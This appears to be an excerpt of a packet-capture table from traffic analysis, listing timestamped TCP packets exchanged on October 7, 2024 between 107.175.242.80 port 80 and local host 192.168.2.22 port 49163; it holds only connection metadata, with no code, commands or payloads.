                                                                Oct 7, 2024 22:41:14.103825092 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.103863001 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.103935003 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.103945017 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.103954077 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.103981972 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.104334116 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.104345083 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.104353905 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.104362965 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.104372025 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.104382992 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.104394913 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196144104 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196166039 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196180105 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196245909 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196285009 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196297884 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196311951 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196325064 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196335077 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196355104 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196841955 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196857929 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196870089 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196883917 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196892023 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196897030 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196911097 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196924925 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196926117 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196939945 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196949005 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.196954966 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.196979046 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197117090 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197129011 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197141886 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197154045 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197165012 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197166920 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197180986 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197191954 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197194099 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197206974 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197220087 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197226048 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197264910 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197825909 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197844982 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197859049 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197875023 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197887897 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197894096 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197907925 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197922945 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197922945 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197938919 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197952032 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197957039 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197973013 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.197979927 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.197988987 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198004007 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198010921 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198018074 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198035955 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198041916 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198055983 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198075056 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198105097 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198688030 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198704004 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198714972 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198729038 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198740005 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198743105 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198754072 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198765993 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198776960 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198780060 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198793888 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198802948 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198805094 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198818922 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198827982 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198832035 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198843956 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198858023 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.198864937 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.198867083 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.199584007 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199598074 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199632883 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.199645042 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199659109 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199670076 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199681997 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199695110 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199698925 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.199707985 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199712992 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.199722052 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199734926 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199747086 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199754000 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.199760914 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199774981 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.199774981 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.199801922 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200431108 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200445890 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200457096 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200475931 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200484037 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200489044 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200501919 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200515032 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200525999 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200526953 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200539112 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200541019 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200553894 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200567007 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200577974 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200582981 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200591087 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200601101 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200604916 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200618029 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200619936 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.200629950 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.200655937 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201402903 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201456070 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201647043 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201664925 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201678991 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201694965 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201705933 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201711893 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201730013 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201741934 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201745987 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201765060 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201771975 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201781988 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201798916 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201809883 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201816082 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201832056 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.201845884 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.201873064 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.202229977 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202249050 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202264071 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202285051 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202291965 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.202301979 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202318907 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202327967 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.202337980 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202357054 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202363014 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.202373028 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.202402115 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.265923977 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.265950918 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.265963078 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266154051 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266211033 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266222954 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266236067 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266247034 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266272068 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266297102 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266340971 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266352892 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266365051 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266376019 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266386986 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266397953 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266407967 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266418934 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266463995 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266463995 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266652107 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266666889 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266679049 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266693115 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266706944 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266711950 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266789913 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.266952038 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266968012 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266982079 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.266997099 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267018080 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267031908 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267208099 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267227888 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267239094 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267249107 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267258883 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267268896 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267272949 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267280102 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267286062 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267292023 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267303944 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267311096 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267318010 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267323971 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267329931 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267342091 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267364979 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267374992 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267766953 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267792940 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267812967 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267837048 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267900944 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267918110 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267936945 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267946005 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267966986 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.267977953 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.267987013 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268003941 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268022060 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268029928 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268043041 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268062115 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268062115 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268079996 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268100023 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268109083 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268145084 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268618107 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268632889 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268645048 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268656969 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268670082 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268671989 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268683910 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268687010 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268699884 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268724918 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268724918 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268738031 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268748045 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268759012 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268764019 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268770933 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268781900 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268781900 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268794060 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.268807888 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.268831968 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269424915 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269437075 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269447088 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269457102 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269467115 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269469976 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269478083 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269488096 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269495010 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269503117 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269503117 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269515991 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269526005 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269536972 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269542933 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269546986 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269558907 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269560099 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269570112 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269579887 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269586086 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.269594908 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.269608974 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270344019 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270354033 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270364046 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270374060 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270384073 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270395041 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270395994 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270406008 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270411968 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270416975 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270426989 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270431042 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270437956 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270450115 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270459890 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270466089 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270467043 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270478010 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270488977 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270498991 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270502090 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270509005 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270514965 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.270519972 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.270543098 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271343946 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271356106 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271373034 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271389961 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271400928 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271409035 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271595001 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271608114 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271616936 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271626949 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271637917 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271648884 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271651030 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271661997 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271667004 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271675110 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271680117 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271687031 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271698952 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271707058 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271709919 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271718979 CEST8049163107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:14.271733999 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.271756887 CEST4916380192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:14.350398064 CEST8049163107.175.242.80192.168.2.22
